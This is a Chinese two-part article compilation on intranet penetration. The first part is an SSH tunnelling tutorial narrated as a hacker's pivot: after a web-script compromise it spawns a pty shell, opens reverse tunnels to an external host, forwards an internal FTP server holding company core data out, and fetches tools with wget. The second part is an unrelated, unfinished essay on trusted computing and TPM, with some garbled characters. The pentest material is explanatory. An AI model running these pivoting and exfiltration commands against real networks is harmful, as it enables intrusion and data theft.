浅谈内网渗透

2024-11-08

浅谈内网渗透（精选3篇）

1.浅谈内网渗透篇一

在渗透测试过程中，经常遇到如下情形，内部网络主机通过路由器或者安全设备做了访问控制，无法通过互联网直接访问本地开放的服务，Windows方面，国内通常选择Lcx.exe来进行端口转发，在应用方面大多数人也会选择reDuh来进行端口转发，而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题，

由于时间有限，本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。

SSH的三个端口转发命令：

ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host

ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host

ssh -C -f -N -g -D listen_port user@Tunnel_Host

-f Fork into background after authentication.

后台认证用户/密码，通常和-N连用，不用登录到远程主机。

-p port Connect to this port. Server must be on the same port.

被登录的ssd服务器的sshd服务端口。

-L port:host:hostport

将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-R port:host:hostport

将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-D port

指定一个本地机器 “动态的’’ 应用程序端口转发. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接. 目前支持 SOCKS4 协议, 将充当 SOCKS4 服务器. 只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发.

-C Enable compression.

压缩数据传输。

-N Do not execute a shell or command.

不执行脚本或命令，通常与-f连用。

-g Allow remote hosts to connect to forwarded ports.

在-L/-R/-D参数中，允许远程主机连接到建立的转发的端口，如果不加这个参数，只允许本地主机建立连接，

注：这个参数我在实践中似乎始终不起作用)

如果想要了解更多关于SSH的细节，可以 man ssh ，或参照ssh的DOC.

实例：

——————————————————————————

当骇客A从互联网入侵了RISUN企业的一台服务器，机器名称为 GBOSS_WEB

GBOSS_WEB 信息：

外网IP：255.25.55.111

内网IP：10.168.0.10

网络架构方式为，路由将外网256.25.56.111的80端口映射到内网10.168.0.10的80端口上。

骇客A通过利用80端口开放服务的WEB脚本漏洞，成功继承到GBOSS_WEB的httpd权限，然后通过perl或者其它语言创建SOCKET 获得一个远程sh shell。由于back回来的shell可能不稳定，或者使用起来不方便，可以采用SSH建立一个隧道，将GBOSS_WEB服务器上的22端口映射至骇客的本机上(本文章用于演示的骇客机为0x.cn);

通过得到的sh shell，执行 $python -c ‘import pty; pty.spawn(”/bin/sh”)’ 获得一个ttyshell(因为ssh想要tty的支持)，然后通过如下命令，映射GBOSS_WEB服务器的22端口至202.65.208.142的 44端口;

$ssh -C -f -N -g -R 44:127.0.0.1:22 ring04h@202.65.208.142

这样登录0x.cn的ssh服务，ssh -p 44 127.0.0.1 等同于连接GBOSS_WEB的22端口。

骇客A通过利用操作系统系统提升权限至ROOT，再继续渗透过程中，发现内网还存在另外一台名称为GBOSS_APP的服务器。

GBOSS_APP 信息：

内网IP：10.168.0.20

骇客通过嗅探获取了GBOSS_APP服务器的FTP信息，GBOSS_APP服务器FTP保存有RISUN企业的核心数据，由于数据量庞大，需要FTP续传功能，可通过SSH映射GBOSS_APP的21端口至0x.cn的2121端口;

$ssh -C -f -N -g -R 2121:10.168.0.20:21 ring04h@202.65.208.142

当骇客成功root掉内网中另一网段中的服务器BILL_APP时，需要从外网下载一些工具，由于内部访问控制策略，BILL_APP无法连接网，此时可以通过映射外网服务器0x.cn的80端口至GBOSS_WEB的8888端口，然后通过GBOSS_WEB建立的隧道，下载所需工具。

在GBOSS_WEB服务器上执行：

$ssh -C -f -N -g user@10.168.0.10 -L 8888:202.65.208.142:80

通过建立隧道后，在BILL_APP上执行 wget 10.168.0.10:8888/thepl 等同于访202.65.208.142/thepl

本文详细的概述了如何建立隧道的过程，以及相关参数的使用方法，各位懂的高手可以直接飘过。

2.浅谈内网渗透篇二

随着网络在企事业单位内部的不断普及,内网安全问题越来越受到关注,内网信息安全技术应用广泛并且含金量高,但信息的可信和可控是其中的关键。

2 什么叫内网信息安全的可信控制

内网安全的概念:一般而言,我们通常以企业局域网的网络边界为限,将企业网络划分为内部网和外部网两个部分,因此内网安全指的就是企业内部局域网的信息安全。

国际ISO15408标准把可信定义为: 一个可信的组件、操作过程的行为在任意操作条件下是可预测的,并能很好地抵抗应用程序软件、病毒以及一定的物理干扰造成的破坏。

国际可信计算组织对可信是从行为的角度进行定义的:一个实体是可信的,并且其对应的行为总是以期望的方式来达到预期的目标。

所以,内网信息安全的可信控制就是确保内网信息系统中内部人员的可信性,避免不可信的已授权用户越权访问内部信息,并破坏内网系统的行为等。

3 内网信息安全对可信控制的需求

可信的发展首先单纯从硬件的方面考虑再到结合硬件与软件共有的特点来实施可信, 最后到既满足硬件和软件的需求, 也满足网络系统与应用系统的不同需求来实施可信。内网信息安全对可信的需求包含几个特征。

(1)可信是相对的。对于同一个实体 ,参照的对象不同会得到不同的结果, 如一个未授权用户的攻击程序,相对攻击者来说此攻击程序是可信的,但相对于内网防护软件来说,该程序是不可信的。

(2)针对特定的问题,根据不同的进程会得到不同的可信性判断结果。如财务经理在内网中查看财务报表的行为是可信的,但若将该报表悄悄发送到所指定的可移动存储设备,此行为则被认为是不可信的。

(3)发生的时间和地点的不同影响着可信性判断。如内网中已授权的用户的操作要比外网中相对合法用户的可信性要高。

4 可信平台

可信计算平台包括了计算机的所有软件和硬件,也包含了为其提供可信计算服务的组织架构。本地用户和远程可信用户都可以通过该平台实现系统的内容的安全性和行为的可靠性。

4.1 可信平台模块

可信平台模块(Trusted Platform Module,TPM)是可信计算平台的核心部件, 它是同时具有运算密码和存储数据的安全芯片。它通过密码运算产生密钥,同时将产生的密钥进行存储管理, 并为其它程序的调用提供接口服务。通TPM对密钥进行配置与管理,可信计算平台能够很好地与其它应用软件相结合,并提供各种安全服务。

在系统启动后,TPM芯片一上电,首先检验其构件是否正常,若正确则进行初始化,BIOS和操作系统依次被TPM进行完整性检验,检验无误后,正常加载操作系统;若检验错误则停止运行。操作系统启动后TPM部件运用加密算法生成该系统的密钥,从而对应用系统进行加解密操作,并提供安全服务接口来保证上一层应用体系的安全。如图1所示。

(1)由输入 / 输出模块负责整个通信总线的管理 ,根据TPM内部的安全策略以及内外总线之间的协议,完成数据信息的通信。

(2)密码协处理器实际上是一个RSA引擎 ,它利用对称加密算法来完成TPM内部的操作,确保安全存储,为其它模块的动态加解密运算提供服务。

(3)密钥生成器运用RSA算法测试大素数 ,并利用发生器产生随机数据。

(4)HMAC引擎可以鉴别通讯信息双方身份的正确性,也可以验证通信数据的完整性。

(5)随机数生成器根据不同的算法产生不同的随机数。

(6)SHA-1引擎是系统启动后最先初始化的模块。它用于实现一种基本的哈希运算,并通过会话形式完成其内外设备的调用。

(7)电源模块主要是完成电源检测。

(8) 非易失性存储器是在意外情况发生后作为数据备份的处理。

(9) 功能开关主要是改变一些标志语而进行的启动或禁用保护措施。

(10)易失性存储器是用来保护芯片内部装置 ,存储由信任链建立所产生的完整性度量根。

4.2 可信平台原理

可信平台的创建过程首先是建立一个可信根,在可信根的基础上建立一条信任链, 再由信任链的传递,将信任关系逐级认证,使这种关系扩展到整个系统。信任源是我们已定义的绝对信任的部件。一个可信平台通常包含有三个基本的可信根, 分别是可信度量根RTM(Root of Trust for Measurement)、可信存储根RTS(Rootof Trust for Storage) 和可信报告根RTR(Root of Trust ofReporting)。

RTM利用计算引擎来完成完整性度量 , 信任链首先从RTM传递给RTR, 通过计算签名将结果报送给RTS进行数据存储。一般情况下,一旦可信平台建立后 ,在TPM和BIOS中保存这三个可信根,它们被认为是绝对可信的。

信任源包含有可信平台构建模块 (Trusted BuildingBlocks,TBB),TBB是过RTM和TPM初始化的信息和其对应的功能组成。可信边界是由TBB和信任根组成,主要用于对计算机的配置进行度量和测试。在应用系统及硬件设备被访问之前, 经过对这些系统资源的度量来建立信任根源,确保整个系统是可信的,最后在可信环境与不可信环境之间建立新的可信边界线。á???&'()056

可信平台信任链的建立过程如图2所示。

5 结束语